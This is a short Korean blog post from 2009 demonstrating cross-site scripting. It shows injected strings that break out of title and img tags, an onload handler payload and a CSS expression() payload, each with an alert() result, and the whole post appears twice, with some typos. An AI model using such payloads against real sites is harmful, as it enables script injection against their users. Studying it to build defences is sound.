-
2009. 6. 6. 23:47 개발자료/낡은코드
자바스크립트 인젝션.
<title></title>
input박스 타이틀 입력: 제목</title><script>alert("안녕~");</script><title>
Hacked : <title>『 Tales 』</title><script>alert("안녕~");</script><title>사용 안함</title>
<img src="URL" />
input박스 주소 입력: 주소" onload="alert('안녕~');
Hacked : <img src="ablut:blank" onload="alert('안녕~');" />
훗,, 신기한 발상이죠 ^^
더나아가서,,
<img src="URL" />
input박스 주소 입력: 주소" onload="alert('GG');" /><script>alert('Trap');</script><img src="" onload="alert('Shield Critical");
Hacked : <img src="" onload="alert('GG');" /><script>alert('Trap');</script><img src="about:blank" onload="alert('Shield Critical");" />
이미지주소 :
<div style="border:expression(alert('O.o ??'));"></div>
<title></title>
input박스 타이틀 입력: 제목</title><script>alert("안녕~");</script><title>
Hacked : <title>『 Tales 』</title><script>alert("안녕~");</script><title>사용 안함</title>
<img src="URL" />
input박스 주소 입력: 주소" onload="alert('안녕~');
Hacked : <img src="ablut:blank" onload="alert('안녕~');" />
훗,, 신기한 발상이죠 ^^
더나아가서,,
<img src="URL" />
input박스 주소 입력: 주소" onload="alert('GG');" /><script>alert('Trap');</script><img src="" onload="alert('Shield Critical");
Hacked : <img src="" onload="alert('GG');" /><script>alert('Trap');</script><img src="about:blank" onload="alert('Shield Critical");" />
이미지주소 :
<div style="border:expression(alert('O.o ??'));"></div>
|
